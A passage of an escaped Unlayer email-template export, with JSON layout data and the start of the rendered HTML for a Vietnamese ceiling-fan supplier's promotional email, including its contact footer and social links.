chi\\u1ebfc.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"OInUiOzcj7\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/quattran.co\\/bai-viet\\/dat-lich-hen\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#54c5cd\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 33px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"41px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>H\\u00c3Y \\u0110\\u1ec2 L\\u1ea0I TH\\u00d4NG TIN, CH\\u00daNG T\\u00d4I S\\u1ebc LI\\u00caN H\\u1ec6 T\\u01af V\\u1ea4N GI\\u00daP B\\u1ea0N<\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":525,\\\"calculatedHeight\\\":47},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OlpIsMPfL1\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"V_x4C7Nw_D\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Nf_PpkTD58\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Comic Sans MS\\\",\\\"value\\\":\\\"comic sans ms,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_21\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%; text-align: center;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; line-height: 39.2px; font-size: 28px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 39.2px;\\\\\\\">CONTACT US<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"ZDU8pRxDhf\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#f1c40f\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_6\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"The World\\u2019s Most Efficient Ceiling Fan\\\"}},{\\\"id\\\":\\\"2zqS-Vt-Lj\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#e4e4eb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_22\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><strong>T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<\\/strong><br \\/><strong>EMAIL: sale@hogiaphat.vn\\u00a0<\\/strong><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">WIT. \\u00a0All rights reserved.\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">Tax: 0315778682<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"oQrXoHNgEt\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-white\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/facebook.com\\/hgpco\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/hogiaphatco\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/whatsapp.com\\/hogiaphatco\\\",\\\"name\\\":\\\"WhatsApp\\\"},{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/hogiaphatco\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/hgpco\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":20,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#262c46\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"-eIptpWf32\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hDocK1PixH\\\",\\\"contents\\\":[{\\\"id\\\":\\\"uBlg6VN2LS\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"12px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_26\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%; text-align: center;\\\\\\\">\\u00a9 WIT Company. All Rights Reserved<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#1d3361\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"headers\\\":[],\\\"footers\\\":[],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fbfbfb\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#5f5f8d\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":16}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #5f5f8d; text-decoration: none; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fbfbfb;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fbfbfb;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fbfbfb;\\\"><![endif]-->\\r\\n    \\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:22px 10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1676879143752-LOGO-HA.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 49%;max-width: 284.2px;\\\" width=\\\"284.2\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n    <!--[if gte mso 9]>\\r\\n      <table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;\\\">\\r\\n        <tr>\\r\\n          <td background=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677300816479-login_customers800.jpg\\\" valign=\\\"top\\\" width=\\\"100%\\\">\\r\\n      <v:rect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" fill=\\\"true\\\" stroke=\\\"false\\\" style=\\\"width: 600px;\\\">\\r\\n        <v:fill type=\\\"frame\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677300816479-login_customers800.jpg\\\" \\/><v:textbox style=\\\"mso-fit-shape-to-text:true\\\" inset=\\\"0,0,0,0\\\">\\r\\n      <![endif]-->\\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #236fa1;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677300816479-login_customers800.jpg\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677300816479-login_customers800.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #236fa1;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:200px 44px 100px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Raleway\',sans-serif; font-size: 160px; font-weight: 700; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">THI\\u1ebeT K\\u1ebe - T\\u01af V\\u1ea4N - CUNG C\\u1ea4P<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\">GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n    <!--[if gte mso 9]>\\r\\n      <\\/v:textbox><\\/v:rect>\\r\\n    <\\/td>\\r\\n    <\\/tr>\\r\\n    <\\/table>\\r\\n    <![endif]-->\\r\\n    \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      